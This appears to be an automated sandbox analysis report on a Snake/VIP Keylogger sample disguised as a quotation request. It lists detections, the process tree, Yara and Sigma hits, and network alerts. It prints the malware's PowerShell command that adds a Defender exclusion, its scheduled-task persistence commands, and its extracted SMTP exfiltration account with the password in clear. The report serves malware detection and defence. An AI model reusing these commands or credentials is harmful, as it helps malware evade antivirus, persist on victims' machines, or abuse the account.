Edit tour

Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Overview

General Information

Sample name:	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Analysis ID:	1560113
MD5:	1ae7a890014eba9c807c6adeabac7671
SHA1:	e3b92645849a3e064d9fc401badf115dab013839
SHA256:	bba1825bd893328442cb891a35420a5da41a5431d1ade643f085c5992e763d3a
Tags:	exeuser-TeamDreier
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe (PID: 2440 cmdline: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" MD5: 1AE7A890014EBA9C807C6ADEABAC7671)

powershell.exe (PID: 4784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7440 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6112 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" MD5: 1AE7A890014EBA9C807C6ADEABAC7671)

WMIADAP.exe (PID: 6112 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)

NuDUTBObHpKADz.exe (PID: 7428 cmdline: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe MD5: 1AE7A890014EBA9C807C6ADEABAC7671)

schtasks.exe (PID: 7588 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

NuDUTBObHpKADz.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" MD5: 1AE7A890014EBA9C807C6ADEABAC7671)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c6ae:$a1: get_encryptedPassword 0x2c9cb:$a2: get_encryptedUsername 0x2c4be:$a3: get_timePasswordChanged 0x2c5c7:$a4: get_passwordField 0x2c6c4:$a5: set_encryptedPassword 0x2dd5f:$a7: get_logins 0x2dcc2:$a10: KeyLoggerEventArgs 0x2d927:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.3829829868.00000000031DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc0466:$a1: get_encryptedPassword 0x103886:$a1: get_encryptedPassword 0x146aa6:$a1: get_encryptedPassword 0xc0783:$a2: get_encryptedUsername 0x103ba3:$a2: get_encryptedUsername 0x146dc3:$a2: get_encryptedUsername 0xc0276:$a3: get_timePasswordChanged 0x103696:$a3: get_timePasswordChanged 0x1468b6:$a3: get_timePasswordChanged 0xc037f:$a4: get_passwordField 0x10379f:$a4: get_passwordField 0x1469bf:$a4: get_passwordField 0xc047c:$a5: set_encryptedPassword 0x10389c:$a5: set_encryptedPassword 0x146abc:$a5: set_encryptedPassword 0xc1b17:$a7: get_logins 0x104f37:$a7: get_logins 0x148157:$a7: get_logins 0xc1a7a:$a10: KeyLoggerEventArgs 0x104e9a:$a10: KeyLoggerEventArgs 0x1480ba:$a10: KeyLoggerEventArgs
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x29757:$a1: get_encryptedPassword 0x29a6a:$a2: get_encryptedUsername 0x29571:$a3: get_timePasswordChanged 0x2967a:$a4: get_passwordField 0x2976d:$a5: set_encryptedPassword 0x2bc19:$a7: get_logins 0x2bb7c:$a10: KeyLoggerEventArgs 0x2b7e5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x150099:$a1: get_encryptedPassword 0x1503ac:$a2: get_encryptedUsername 0x14feb3:$a3: get_timePasswordChanged 0x14ffbc:$a4: get_passwordField 0x1500af:$a5: set_encryptedPassword 0x15255b:$a7: get_logins 0x1524be:$a10: KeyLoggerEventArgs 0x152127:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: NuDUTBObHpKADz.exe PID: 7428	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: NuDUTBObHpKADz.exe PID: 7636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NuDUTBObHpKADz.exe PID: 7636	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8ae:$a1: get_encryptedPassword 0x2dbcb:$a2: get_encryptedUsername 0x2d6be:$a3: get_timePasswordChanged 0x2d7c7:$a4: get_passwordField 0x2d8c4:$a5: set_encryptedPassword 0x2ef5f:$a7: get_logins 0x2eec2:$a10: KeyLoggerEventArgs 0x2eb27:$a11: KeyLoggerEventArgsEventHandler
9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b664:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ad07:$a3: \Google\Chrome\User Data\Default\Login Data 0x3af64:$a4: \Orbitum\User Data\Default\Login Data 0x3b943:$a5: \Kometa\User Data\Default\Login Data
9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e4b9:$s1: UnHook 0x2e4c0:$s2: SetHook 0x2e4c8:$s3: CallNextHook 0x2e4d5:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2baae:$a1: get_encryptedPassword 0x2bdcb:$a2: get_encryptedUsername 0x2b8be:$a3: get_timePasswordChanged 0x2b9c7:$a4: get_passwordField 0x2bac4:$a5: set_encryptedPassword 0x2d15f:$a7: get_logins 0x2d0c2:$a10: KeyLoggerEventArgs 0x2cd27:$a11: KeyLoggerEventArgsEventHandler
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39864:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38f07:$a3: \Google\Chrome\User Data\Default\Login Data 0x39164:$a4: \Orbitum\User Data\Default\Login Data 0x39b43:$a5: \Kometa\User Data\Default\Login Data
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c6b9:$s1: UnHook 0x2c6c0:$s2: SetHook 0x2c6c8:$s3: CallNextHook 0x2c6d5:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2baae:$a1: get_encryptedPassword 0x2bdcb:$a2: get_encryptedUsername 0x2b8be:$a3: get_timePasswordChanged 0x2b9c7:$a4: get_passwordField 0x2bac4:$a5: set_encryptedPassword 0x2d15f:$a7: get_logins 0x2d0c2:$a10: KeyLoggerEventArgs 0x2cd27:$a11: KeyLoggerEventArgsEventHandler
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39864:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38f07:$a3: \Google\Chrome\User Data\Default\Login Data 0x39164:$a4: \Orbitum\User Data\Default\Login Data 0x39b43:$a5: \Kometa\User Data\Default\Login Data
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c6b9:$s1: UnHook 0x2c6c0:$s2: SetHook 0x2c6c8:$s3: CallNextHook 0x2c6d5:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8ae:$a1: get_encryptedPassword 0x70ace:$a1: get_encryptedPassword 0x2dbcb:$a2: get_encryptedUsername 0x70deb:$a2: get_encryptedUsername 0x2d6be:$a3: get_timePasswordChanged 0x708de:$a3: get_timePasswordChanged 0x2d7c7:$a4: get_passwordField 0x709e7:$a4: get_passwordField 0x2d8c4:$a5: set_encryptedPassword 0x70ae4:$a5: set_encryptedPassword 0x2ef5f:$a7: get_logins 0x7217f:$a7: get_logins 0x2eec2:$a10: KeyLoggerEventArgs 0x720e2:$a10: KeyLoggerEventArgs 0x2eb27:$a11: KeyLoggerEventArgsEventHandler 0x71d47:$a11: KeyLoggerEventArgsEventHandler
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e4b9:$s1: UnHook 0x716d9:$s1: UnHook 0x2e4c0:$s2: SetHook 0x716e0:$s2: SetHook 0x2e4c8:$s3: CallNextHook 0x716e8:$s3: CallNextHook 0x2e4d5:$s4: _hook 0x716f5:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8ae:$a1: get_encryptedPassword 0x70cce:$a1: get_encryptedPassword 0xb3eee:$a1: get_encryptedPassword 0x2dbcb:$a2: get_encryptedUsername 0x70feb:$a2: get_encryptedUsername 0xb420b:$a2: get_encryptedUsername 0x2d6be:$a3: get_timePasswordChanged 0x70ade:$a3: get_timePasswordChanged 0xb3cfe:$a3: get_timePasswordChanged 0x2d7c7:$a4: get_passwordField 0x70be7:$a4: get_passwordField 0xb3e07:$a4: get_passwordField 0x2d8c4:$a5: set_encryptedPassword 0x70ce4:$a5: set_encryptedPassword 0xb3f04:$a5: set_encryptedPassword 0x2ef5f:$a7: get_logins 0x7237f:$a7: get_logins 0xb559f:$a7: get_logins 0x2eec2:$a10: KeyLoggerEventArgs 0x722e2:$a10: KeyLoggerEventArgs 0xb5502:$a10: KeyLoggerEventArgs
0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e4b9:$s1: UnHook 0x718d9:$s1: UnHook 0xb4af9:$s1: UnHook 0x2e4c0:$s2: SetHook 0x718e0:$s2: SetHook 0xb4b00:$s2: SetHook 0x2e4c8:$s3: CallNextHook 0x718e8:$s3: CallNextHook 0xb4b08:$s3: CallNextHook 0x2e4d5:$s4: _hook 0x718f5:$s4: _hook 0xb4b15:$s4: _hook
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ProcessId: 4784, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe, ParentImage: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe, ParentProcessId: 7428, ParentProcessName: NuDUTBObHpKADz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp", ProcessId: 7588, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", ProcessId: 6112, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ProcessId: 4784, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", ProcessId: 6112, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T12:20:16.938410+0100	2803305	3	Unknown Traffic	192.168.2.9	49734	188.114.97.3	443	TCP
2024-11-21T12:20:20.211067+0100	2803305	3	Unknown Traffic	192.168.2.9	49748	188.114.97.3	443	TCP
2024-11-21T12:20:22.138040+0100	2803305	3	Unknown Traffic	192.168.2.9	49751	188.114.97.3	443	TCP
2024-11-21T12:20:25.348486+0100	2803305	3	Unknown Traffic	192.168.2.9	49764	188.114.97.3	443	TCP
2024-11-21T12:20:26.637765+0100	2803305	3	Unknown Traffic	192.168.2.9	49767	188.114.97.3	443	TCP
2024-11-21T12:20:28.506892+0100	2803305	3	Unknown Traffic	192.168.2.9	49775	188.114.97.3	443	TCP
2024-11-21T12:20:34.843367+0100	2803305	3	Unknown Traffic	192.168.2.9	49797	188.114.97.3	443	TCP
2024-11-21T12:20:37.955589+0100	2803305	3	Unknown Traffic	192.168.2.9	49806	188.114.97.3	443	TCP
2024-11-21T12:20:44.227515+0100	2803305	3	Unknown Traffic	192.168.2.9	49828	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T12:20:12.874125+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49720	193.122.6.168	80	TCP
2024-11-21T12:20:15.264721+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49720	193.122.6.168	80	TCP
2024-11-21T12:20:18.108479+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49740	193.122.6.168	80	TCP
2024-11-21T12:20:18.467840+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49741	193.122.6.168	80	TCP
2024-11-21T12:20:20.467892+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49740	193.122.6.168	80	TCP
